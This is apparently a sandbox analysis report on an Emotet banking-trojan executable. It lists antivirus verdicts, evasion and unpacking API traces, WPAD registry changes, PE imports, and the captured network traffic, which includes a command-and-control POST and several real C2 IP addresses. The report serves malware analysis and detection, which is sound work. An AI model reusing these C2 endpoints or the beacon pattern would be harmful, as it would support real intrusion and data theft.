7.8
高危
57 个模型检测该样本为恶意!
重新分析
更多

5ab93310f1ce4645dea1e0a318b5b053410d9c22f0329d4684e1471262e0e8f4

8215641f4931448492fd21aca7a8c998.exe

分析耗时

87s

最近分析

文件大小

452.0KB
静态报毒 动态报毒 AI SCORE=80 BANKERX CLASSIC CONFIDENCE CQ0@AMEYG5KO DOWNLOADER34 ELDORADO EMOTET GDMK GENCIRC GENERICKDZ GENETIC HFYL HHBBI HIGH CONFIDENCE HUBYLX KRYPTIK MALWARE@#3BTKP3X22P62T R + TROJ R350747 SCORE SOCELARSTAH THIAOBO TROJANBANKER UNSAFE WACATAC ZEXAE 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/Emotet.36f67a76 20190527 0.3.0.5
Avast Win32:BankerX-gen [Trj] 20201022 18.4.3895.0
Baidu 20190318 1.0.0.2
Kingsoft 20201022 2013.8.14.323
McAfee Emotet-FSC!8215641F4931 20201022 6.0.6.653
Tencent Malware.Win32.Gencirc.10cdfdbb 20201022 1.0.0.1
CrowdStrike win/malicious_confidence_60% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619685938.015375
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1619685927.390375
CryptGenKey
crypto_handle: 0x00936b10
algorithm_identifier: 0x0000660e ()
provider_handle: 0x00936128
flags: 1
key: f¢Ä¸,Jׂ¿•:Éñy@
success 1 0
1619685938.030375
CryptExportKey
crypto_handle: 0x00936b10
crypto_export_handle: 0x009361f0
buffer: f¤ T¢d$@`ß@î]- ‡<ün¥röó—TÜ wݳÁ¥Ñò‹ÅÀÅvçØ0ó$9ڃ6`Ötċƒƒ#Q›Œ0¡'^›„»DŽ¶Ê1˜ "êX‡íû^v4
blob_type: 1
flags: 64
success 1 0
1619685965.452375
CryptExportKey
crypto_handle: 0x00936b10
crypto_export_handle: 0x009361f0
buffer: f¤6~f¢Ë¯´è+¶œ4 Ëf¸)bøÀÂV¡;ü=l|ƒ<)Ë1?ô—Å’Rt¥¯Éæ Lf¶_ɐÈÑƸÁÚ³UÏøցÛöó„煁jB”šµžAJëKcÒ‹
blob_type: 1
flags: 64
success 1 0
1619685969.577375
CryptExportKey
crypto_handle: 0x00936b10
crypto_export_handle: 0x009361f0
buffer: f¤D_“½×>ý{KÙƇ…šÅËCG81€P€RʟP>YMx¥â™/,n1vÊE6…kˆY¢§úNÃz{òÇs·0¥C_ÞÌñY¯Å¶i=Loù×ã‘kg¿í„µð‹ç÷BZ%«¢€D
blob_type: 1
flags: 64
success 1 0
1619685973.437375
CryptExportKey
crypto_handle: 0x00936b10
crypto_export_handle: 0x009361f0
buffer: f¤ê°lý ŒsÌ5íµK³¹p ŠH§Uq¡t@ăìsa3½“¶¸Ëw\"‹)4ó÷[Ø6«£"’Î{}/“ƒêK ,èX{Ž°b5„-Oƒ!=Çê«×\“Ø–
blob_type: 1
flags: 64
success 1 0
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1619685926.577375
NtAllocateVirtualMemory
process_identifier: 2420
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00630000
success 0 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (43 个事件)
Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 个事件)
Time & API Arguments Status Return Repeated
1619685926.577375
NtProtectVirtualMemory
process_identifier: 2420
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 28672
protection: 32 (PAGE_EXECUTE_READ)
process_handle: 0xffffffff
base_address: 0x00651000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619685938.593375
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process 8215641f4931448492fd21aca7a8c998.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619685938.280375
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (5 个事件)
host 142.44.137.67
host 162.241.242.173
host 172.217.24.14
host 192.158.216.73
host 85.214.28.226
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619685941.155375
RegSetValueExA
key_handle: 0x000003c8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619685941.155375
RegSetValueExA
key_handle: 0x000003c8
value: gŸFÃ<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619685941.155375
RegSetValueExA
key_handle: 0x000003c8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619685941.155375
RegSetValueExW
key_handle: 0x000003c8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619685941.171375
RegSetValueExA
key_handle: 0x000003dc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619685941.171375
RegSetValueExA
key_handle: 0x000003dc
value: gŸFÃ<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619685941.171375
RegSetValueExA
key_handle: 0x000003dc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619685941.187375
RegSetValueExW
key_handle: 0x000003c4
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Generates some ICMP traffic
File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 个事件)
Bkav W32.SocelarsTAH.Trojan
Elastic malicious (high confidence)
DrWeb Trojan.DownLoader34.32516
MicroWorld-eScan Trojan.GenericKDZ.69914
FireEye Generic.mg.8215641f49314484
Qihoo-360 Win32/Trojan.baa
ALYac Trojan.Agent.Emotet
Cylance Unsafe
Zillya Trojan.Emotet.Win32.28386
K7AntiVirus Trojan ( 0056dc3b1 )
Alibaba Trojan:Win32/Emotet.36f67a76
K7GW Trojan ( 0056dc3b1 )
Arcabit Trojan.Generic.D1111A
TrendMicro Trojan.Win32.WACATAC.THIAOBO
BitDefenderTheta Gen:NN.ZexaE.34570.Cq0@amEyG5kO
Cyren W32/Kryptik.BWK.gen!Eldorado
Symantec Packed.Generic.554
TrendMicro-HouseCall Trojan.Win32.WACATAC.THIAOBO
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Packed.Emotet-9753169-0
Kaspersky Trojan-Banker.Win32.Emotet.gdmk
BitDefender Trojan.GenericKDZ.69914
NANO-Antivirus Trojan.Win32.Emotet.hubylx
Paloalto generic.ml
AegisLab Trojan.Win32.Emotet.L!c
Rising Trojan.Emotet!1.CBDE (CLASSIC)
Ad-Aware Trojan.GenericKDZ.69914
TACHYON Banker/W32.Emotet.462848.F
Emsisoft Trojan.GenericKDZ.69914 (B)
Comodo Malware@#3btkp3x22p62t
F-Secure Trojan.TR/Crypt.Agent.hhbbi
VIPRE Trojan.Win32.Generic!BT
Invincea Mal/Generic-R + Troj/Emotet-CNA
McAfee-GW-Edition BehavesLike.Win32.Emotet.gh
Sophos Troj/Emotet-CNA
Jiangmin Trojan.Banker.Emotet.ohu
Webroot W32.Trojan.Gen
Avira TR/Crypt.Agent.hhbbi
Antiy-AVL Trojan[Banker]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARJ!MTB
ViRobot Trojan.Win32.Z.Emotet.462848.XA
ZoneAlarm Trojan-Banker.Win32.Emotet.gdmk
GData Trojan.GenericKDZ.69914
Cynet Malicious (score: 85)
AhnLab-V3 Trojan/Win32.Emotet.R350747
McAfee Emotet-FSC!8215641F4931
MAX malware (ai score=80)
VBA32 TrojanBanker.Emotet
Malwarebytes Trojan.MalPack.TRE
APEX Malicious
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (6 个事件)
dead_host 172.217.160.110:443
dead_host 192.168.56.101:49180
dead_host 172.217.24.14:443
dead_host 162.241.242.173:8080
dead_host 192.158.216.73:80
dead_host 85.214.28.226:8080
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-09-04 16:54:57

Imports

Library KERNEL32.dll:
0x43e0ac GetFileAttributesA
0x43e0b0 GetFileTime
0x43e0b4 SetErrorMode
0x43e0b8 GetTickCount
0x43e0bc RtlUnwind
0x43e0c0 HeapAlloc
0x43e0c4 TerminateProcess
0x43e0d0 IsDebuggerPresent
0x43e0d4 HeapFree
0x43e0d8 HeapReAlloc
0x43e0dc VirtualProtect
0x43e0e0 VirtualAlloc
0x43e0e4 GetSystemInfo
0x43e0e8 VirtualQuery
0x43e0f0 RaiseException
0x43e0f4 GetCommandLineA
0x43e0f8 GetProcessHeap
0x43e0fc GetStartupInfoA
0x43e100 ExitProcess
0x43e104 HeapSize
0x43e108 SetStdHandle
0x43e10c GetFileType
0x43e110 Sleep
0x43e114 GetACP
0x43e118 LCMapStringW
0x43e11c VirtualFree
0x43e120 HeapDestroy
0x43e124 HeapCreate
0x43e128 GetStdHandle
0x43e12c GetStringTypeA
0x43e130 GetStringTypeW
0x43e148 SetHandleCount
0x43e150 GetConsoleCP
0x43e154 GetConsoleMode
0x43e158 WriteConsoleA
0x43e15c GetConsoleOutputCP
0x43e160 WriteConsoleW
0x43e168 GetOEMCP
0x43e16c GetCPInfo
0x43e170 CreateFileA
0x43e174 GetFullPathNameA
0x43e17c FindFirstFileA
0x43e180 FindClose
0x43e184 GetCurrentProcess
0x43e188 DuplicateHandle
0x43e18c GetThreadLocale
0x43e190 SetEndOfFile
0x43e194 UnlockFile
0x43e198 LockFile
0x43e19c FlushFileBuffers
0x43e1a0 SetFilePointer
0x43e1a4 WriteFile
0x43e1a8 ReadFile
0x43e1b0 TlsFree
0x43e1b4 LocalReAlloc
0x43e1b8 TlsSetValue
0x43e1bc TlsAlloc
0x43e1c0 GlobalHandle
0x43e1c4 GlobalReAlloc
0x43e1c8 TlsGetValue
0x43e1cc GlobalFlags
0x43e1d0 LocalAlloc
0x43e1f0 GetModuleFileNameW
0x43e1f4 GlobalGetAtomNameA
0x43e1f8 GlobalFindAtomA
0x43e1fc lstrcmpW
0x43e200 GetVersionExA
0x43e204 FormatMessageA
0x43e208 LocalFree
0x43e20c MulDiv
0x43e214 GlobalUnlock
0x43e218 GlobalFree
0x43e21c FreeResource
0x43e220 GetCurrentProcessId
0x43e224 SetLastError
0x43e228 GlobalAddAtomA
0x43e22c WaitForSingleObject
0x43e230 GetCurrentThread
0x43e234 GetCurrentThreadId
0x43e23c GetModuleFileNameA
0x43e244 GetLocaleInfoA
0x43e248 LoadLibraryA
0x43e24c GlobalLock
0x43e250 lstrcmpA
0x43e254 GlobalAlloc
0x43e258 FreeLibrary
0x43e25c GlobalDeleteAtom
0x43e260 GetModuleHandleA
0x43e264 GetFileSize
0x43e268 CloseHandle
0x43e26c lstrlenA
0x43e270 CompareStringW
0x43e274 CompareStringA
0x43e278 GetVersion
0x43e27c GetLastError
0x43e280 MultiByteToWideChar
0x43e284 InterlockedExchange
0x43e288 WideCharToMultiByte
0x43e28c GetProcAddress
0x43e290 FindResourceA
0x43e294 LoadResource
0x43e298 LockResource
0x43e29c LCMapStringA
0x43e2a0 SizeofResource
Library USER32.dll:
0x43e2f8 InvalidateRect
0x43e2fc InvalidateRgn
0x43e300 GetNextDlgGroupItem
0x43e304 MessageBeep
0x43e308 UnregisterClassA
0x43e310 PostThreadMessageA
0x43e314 EndPaint
0x43e318 BeginPaint
0x43e31c GetWindowDC
0x43e320 ClientToScreen
0x43e324 GrayStringA
0x43e328 DrawTextExA
0x43e32c DrawTextA
0x43e330 TabbedTextOutA
0x43e334 DestroyMenu
0x43e338 ShowWindow
0x43e33c MoveWindow
0x43e340 SetWindowTextA
0x43e344 IsDialogMessageA
0x43e348 SetDlgItemTextA
0x43e350 SendDlgItemMessageA
0x43e354 WinHelpA
0x43e358 IsChild
0x43e35c GetCapture
0x43e360 GetClassLongA
0x43e364 GetClassNameA
0x43e368 SetPropA
0x43e36c GetPropA
0x43e370 RemovePropA
0x43e374 SetFocus
0x43e37c GetWindowTextA
0x43e380 GetForegroundWindow
0x43e384 GetTopWindow
0x43e388 SetRect
0x43e38c GetMessageTime
0x43e390 GetMessagePos
0x43e394 MapWindowPoints
0x43e398 SetForegroundWindow
0x43e39c UpdateWindow
0x43e3a0 GetMenu
0x43e3a4 CreateWindowExA
0x43e3a8 GetClassInfoExA
0x43e3ac GetClassInfoA
0x43e3b0 GetSysColor
0x43e3b4 AdjustWindowRectEx
0x43e3b8 EqualRect
0x43e3bc PtInRect
0x43e3c0 GetDlgCtrlID
0x43e3c4 DefWindowProcA
0x43e3c8 CallWindowProcA
0x43e3cc SetWindowLongA
0x43e3d0 OffsetRect
0x43e3d4 IntersectRect
0x43e3dc GetWindowPlacement
0x43e3e0 GetWindowRect
0x43e3e4 GetMenuItemID
0x43e3e8 GetMenuItemCount
0x43e3ec GetSubMenu
0x43e3f0 GetWindow
0x43e3f8 MapDialogRect
0x43e3fc SetWindowPos
0x43e400 ReleaseDC
0x43e404 GetDC
0x43e408 CopyRect
0x43e40c GetDesktopWindow
0x43e410 SetActiveWindow
0x43e418 DestroyWindow
0x43e41c GetDlgItem
0x43e420 GetNextDlgTabItem
0x43e424 EndDialog
0x43e42c GetWindowLongA
0x43e430 GetLastActivePopup
0x43e434 IsWindowEnabled
0x43e438 MessageBoxA
0x43e43c SetCursor
0x43e440 SetWindowsHookExA
0x43e444 CallNextHookEx
0x43e448 GetMessageA
0x43e44c IsRectEmpty
0x43e454 CharNextA
0x43e458 GetSysColorBrush
0x43e45c ReleaseCapture
0x43e460 LoadCursorA
0x43e464 UnhookWindowsHookEx
0x43e468 SetCapture
0x43e46c TranslateMessage
0x43e470 DispatchMessageA
0x43e474 GetActiveWindow
0x43e478 IsWindowVisible
0x43e47c GetKeyState
0x43e480 PeekMessageA
0x43e484 GetCursorPos
0x43e488 ValidateRect
0x43e48c SetMenuItemBitmaps
0x43e494 LoadBitmapA
0x43e498 GetFocus
0x43e49c GetParent
0x43e4a0 ModifyMenuA
0x43e4a4 GetMenuState
0x43e4a8 EnableMenuItem
0x43e4ac CheckMenuItem
0x43e4b0 PostMessageA
0x43e4b4 PostQuitMessage
0x43e4b8 IsWindow
0x43e4bc RedrawWindow
0x43e4c0 CharUpperA
0x43e4c4 GetSystemMetrics
0x43e4c8 LoadIconA
0x43e4cc EnableWindow
0x43e4d0 GetClientRect
0x43e4d4 IsIconic
0x43e4d8 GetSystemMenu
0x43e4dc SendMessageA
0x43e4e0 AppendMenuA
0x43e4e4 DrawIcon
0x43e4e8 RegisterClassA
Library GDI32.dll:
0x43e028 SetWindowExtEx
0x43e02c ScaleWindowExtEx
0x43e030 ExtSelectClipRgn
0x43e034 DeleteDC
0x43e038 GetStockObject
0x43e03c ScaleViewportExtEx
0x43e040 GetMapMode
0x43e044 GetBkColor
0x43e048 GetTextColor
0x43e04c GetRgnBox
0x43e050 DeleteObject
0x43e054 SetViewportExtEx
0x43e058 OffsetViewportOrgEx
0x43e05c SetViewportOrgEx
0x43e060 SelectObject
0x43e064 Escape
0x43e068 TextOutA
0x43e06c RectVisible
0x43e070 PtVisible
0x43e074 GetWindowExtEx
0x43e078 CreateBitmap
0x43e07c SetMapMode
0x43e080 RestoreDC
0x43e084 SaveDC
0x43e088 ExtTextOutA
0x43e08c GetObjectA
0x43e090 SetBkColor
0x43e094 SetTextColor
0x43e098 GetClipBox
0x43e09c GetDeviceCaps
0x43e0a4 GetViewportExtEx
Library comdlg32.dll:
0x43e53c GetFileTitleA
Library WINSPOOL.DRV:
0x43e52c DocumentPropertiesA
0x43e530 OpenPrinterA
0x43e534 ClosePrinter
Library ADVAPI32.dll:
0x43e000 RegSetValueExA
0x43e004 RegCreateKeyExA
0x43e008 RegQueryValueA
0x43e00c RegOpenKeyA
0x43e010 RegEnumKeyA
0x43e014 RegDeleteKeyA
0x43e018 RegOpenKeyExA
0x43e01c RegQueryValueExA
0x43e020 RegCloseKey
Library SHLWAPI.dll:
0x43e2e0 PathFindFileNameA
0x43e2e4 UrlUnescapeA
0x43e2e8 PathStripToRootA
0x43e2ec PathFindExtensionA
0x43e2f0 PathIsUNCA
Library oledlg.dll:
0x43e584
Library ole32.dll:
0x43e548 CLSIDFromProgID
0x43e54c CLSIDFromString
0x43e550 CoTaskMemFree
0x43e554 CoTaskMemAlloc
0x43e558 CoGetClassObject
0x43e564 OleUninitialize
0x43e56c OleInitialize
0x43e570 CoRevokeClassObject
0x43e578 OleFlushClipboard
Library OLEAUT32.dll:
0x43e2a8 VariantCopy
0x43e2ac SysAllocString
0x43e2b0 SafeArrayDestroy
0x43e2bc SysStringLen
0x43e2c0 VariantInit
0x43e2c4 VariantChangeType
0x43e2c8 VariantClear
0x43e2cc SysAllocStringLen
0x43e2d0 SysFreeString
Library WININET.dll:
0x43e4f0 InternetOpenUrlA
0x43e4f4 InternetReadFile
0x43e4f8 InternetWriteFile
0x43e504 InternetOpenA
0x43e50c InternetCloseHandle
0x43e510 HttpQueryInfoA
0x43e520 InternetCrackUrlA

Exports

Ordinal Address Name
1 0x4013da RC4

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49181 142.44.137.67 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900

HTTP & HTTPS Requests

URI Data
http://142.44.137.67:443/09Ya2/fRGhtk/ 
POST /09Ya2/fRGhtk/ HTTP/1.1
Content-Type: multipart/form-data; boundary=---------LnxqSvq8H
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4516
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.